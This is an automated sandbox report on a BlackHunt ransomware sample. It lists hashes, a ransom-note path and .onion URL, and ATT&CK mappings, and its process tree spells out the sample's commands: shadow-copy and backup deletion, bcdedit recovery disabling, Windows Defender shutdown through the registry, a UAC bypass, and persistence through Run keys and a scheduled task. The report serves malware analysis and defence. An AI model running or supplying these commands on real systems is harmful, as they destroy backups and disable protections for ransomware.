Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 152s
max time network: 149s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 19/01/2024, 00:05
Static task: static1
Behavioral task: behavioral1
Sample: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Resource: win7-20231215-en
Behavioral task: behavioral2
Sample: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Resource: win10v2004-20231215-en
General
Target: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Size: 707KB
MD5: 7872e09ba0a15441604e90545b04aab7
SHA1: c501ee9736dae19a046715f114e1ac7baf287f2f
SHA256: 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f
SHA512: 4304de6648353dc7c4dc5a906e53e66d17018b69d6ffceb9718455288d71fb9237de6ca9755a41d892522f003c8751939c860cdfa54765915c765dd7492bb60a
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I8Qvnh:6uaTmkZJ+naie5OTamgEoKxLW7Oh
Malware Config
Extracted
Path: C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
Deletes NTFS Change Journal (2 TTPs, 1 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process
2072 fsutil.exe
Modifies Windows Defender Real-time Protection settings
description ioc Process
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe
UAC bypass
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
pid Process
2752 bcdedit.exe
1860 bcdedit.exe
Renames multiple (2363) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
pid Process
2228 wbadmin.exe
Disables Task Manager via registry modification
Disables use of System Restore points (1 TTPs)
Adds Run key to start application (2 TTPs, 1 IoCs)
description ioc Process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe
Checks whether UAC is enabled
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc
2 ip-api.com
Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
2896 schtasks.exe
Interacts with shadow copies (2 TTPs, 5 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
1508 vssadmin.exe
2276 vssadmin.exe
1812 vssadmin.exe
2184 vssadmin.exe
864 vssadmin.exe
Modifies registry class (10 IoCs)
description ioc Process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe
Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe
Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe
Suspicious use of AdjustPrivilegeToken (13 IoCs)
description pid Process
Token: SeDebugPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeRestorePrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeBackupPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeTakeOwnershipPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeAuditPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeSecurityPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeIncBasePriorityPrivilege 3000 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Token: SeBackupPrivilege 1932 vssvc.exe
Token: SeRestorePrivilege 1932 vssvc.exe
Token: SeAuditPrivilege 1932 vssvc.exe
Token: SeBackupPrivilege 2644 wbengine.exe
Token: SeRestorePrivilege 2644 wbengine.exe
Token: SeSecurityPrivilege 2644 wbengine.exe
Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTPs, 3 IoCs)
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe
"C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe"
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3000
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  - Suspicious use of WriteProcessMemory
  PID:2660
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Modifies registry class
    PID:2192
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  - Suspicious use of WriteProcessMemory
  PID:604
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    - Modifies registry class
    PID:2768
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  - Suspicious use of WriteProcessMemory
  PID:2100
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    - Modifies registry class
    PID:2888
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  - Suspicious use of WriteProcessMemory
  PID:2308
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Modifies registry class
    PID:2892
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
  PID:2720
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    - Adds Run key to start application
    PID:2716
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  PID:2728
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    PID:2596
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
  PID:2860
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    - Modifies Windows Defender Real-time Protection settings
    PID:2612
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  PID:2852
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    PID:2700
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  PID:2940
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    PID:3012
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  PID:2872
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    PID:2580
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  PID:2140
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    PID:2108
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  PID:2608
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    PID:2512
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  PID:2824
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    PID:1092
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  PID:2744
    C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    PID:1548
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  PID:1448
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    PID:1748
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  PID:2576
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    PID:1064
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  PID:2848
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    PID:1896
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  PID:2652
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    PID:896
  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  PID:3008
    C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    PID:472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1260
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1072
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2164
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe" /F2⤵PID:800
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8ac43b85cd27b405fabf9188706f9f33c97fecd2459b4ce70ccede9c2dfb681f.exe" /F3⤵
- Creates scheduled task(s)
PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1632
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1764
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2792
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2804
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2756
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2920
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2300
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2360
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2776
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2384
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:980
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1652
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1980
Network
MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
  Scheduled Task/Job (1)

Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1)
    Windows Service (1)
  Scheduled Task/Job (1)

Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (2)
    Disable or Modify Tools (2)
  Indicator Removal (3)
    File Deletion (3)
  Modify Registry (4)
Downloads

Filesize: 1KB
MD5: dd1ea4dfeaba06c96eac72e07f5dcd24
SHA1: 18b24805d004ba834d67199a15f317ca8c23b49a
SHA256: 0ff754736c59129820d9a4d107c583f4a288a30eece404e9a866de040f7d1fd4
SHA512: 0a695a33d74da7755e6be4ebd6117e75193af220ea915d8b30f2924d7f25139012b712b08f843099727b5bc76bd485b0e0521647c7e8ca39710570d7215f4b53

Filesize: 12KB
MD5: 037fe0fba2f39cf6548aafb6ff737c6f
SHA1: c4f69c30343958088c3dbaea8c70cbb84c099db6
SHA256: 89218d851754c7ebcb9bb7b17b04779384775c3100f901dc219572d935b80a89
SHA512: 95fcb1686b2136cc179476d0c5392bedcef838f84ae2cba3c07a89886768e73b6600adc0f958bf416dfdf7edefd4f90a2daa4cc9e02c845a10fb8848052e2bc6

Filesize: 684B
MD5: 7afcdbd6a2b1ae976f79a6043a90c100
SHA1: 60f49882d20d7ed9be199380f0925737ddd1f2c1
SHA256: 6f6db9e2a050a12f28708b22f9d2f12971661b343ac36eee0b51eb9d4769de7f
SHA512: f11a13376457876109c7903fc118512a8517f8a48d03dd7eec39c6312a3f5f453d42ae7209ac3551896843f640296240797cb587068a598c5214f856fb719b06